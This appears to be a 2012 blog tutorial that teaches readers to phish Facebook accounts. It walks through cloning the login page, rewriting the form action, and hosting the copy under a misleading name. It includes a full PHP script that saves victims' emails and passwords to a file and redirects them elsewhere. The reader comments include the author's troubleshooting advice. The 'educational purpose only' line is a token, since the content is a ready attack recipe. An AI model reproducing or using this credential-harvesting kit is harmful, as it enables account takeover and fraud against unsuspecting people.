Hacking facebook account:Phishing

Posted In Tutorials - By Bhushan On Tuesday, August 14th, 2012 With 3 Comments

The world of  PHISHING

What is phishing?

It is an attempt to illegally acquire confidential data by masquerading as a trustworthy entity in an electronic communication.

Requirements for facebook phishing:
Account on any free-hosting site, such as my3gb.com

What you have to do:

1) Go to facebook.com
Save this page and open it with a notepad or any other text editor.
2)now edit Welcome to Facebook – Log In, Sign Up or    Learn More.htm in notepad.
3)  search for action (Press Ctrl+F)
you will see like
action=”https://www.facebook.com/login.php?login_attempt=1″
now replace https://www.facebook.com/login.php?login_attempt=1   by login.php
login.php is a php script to get user’s email-id and password.
now it will look like
action=”login.php”
save this file and name it as facebook.com.htm
because victim will see this name in address bar.
4)now open new text document and copy below script in it

<?php
 $fp = fopen(“Passwords.htm”, “a”);
fwrite($fp, “Email of victim:$_POST[email]\nPassword:$_POST[pass]“);
header( ‘Location: www.google.com) ;;
/*any web-site you want to redirect user after pressing log-in
but not facebook.com because it gives warning that we are redirected from phishing page  remove this comment after copying */
?>

now save this file as login.php
it will ask to change file format choose yes.
5) Now you are ready to upload these two files to file-manager of free-hosting site.
6) After uploading files on site double click on
facebook login html file
browser will open your html but in address bar it is showing your username with your free-hosting site.
so while creating account on free-hosting site be sure with our username.keep it as recovery-facebook
something that won’t let victim take a doubt that this is a phishing facebook page.


7)when victim will enter his email-id and password as he/she hits on login new file password.htm is created in your
file-manager with e-mail id and password.

but victim will more likely click on link if he / she has got mail from facebook to make a secure-login on provided link

to read how to send fake mail click here

click here to go to fake site

This information should be used for educational purpose only to protect yourself.

 


Displaying 3 Comments
Have Your Say

  1. LeoAM says:

    I have created these two files and before uploading I tried myself on the folder in my desktop, but it does not create password.htm. Can you tell me did I do it wrong? or does this not work in my own PC?

    Thanks

    • Bhushan says:

      On desktop in secure-login.html when you are entering username and password in your browser,after login you will see your login.php script in browser. this is because you are not executing login.php so secure-login.html takes it as text format.
      try this.
      1)copy this comment and paste it in new text document,
      2)rename it as file.html.
      now double click on it you will see your text in browser.
      that’s it.
      In free-hosting site you will see that it includes php,html that means that hosting server can execute your files

  2. Manuel says:

    That insight’s just what I’ve been lokoing for. Thanks!

Leave a comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Email
WP Socializer Aakash Web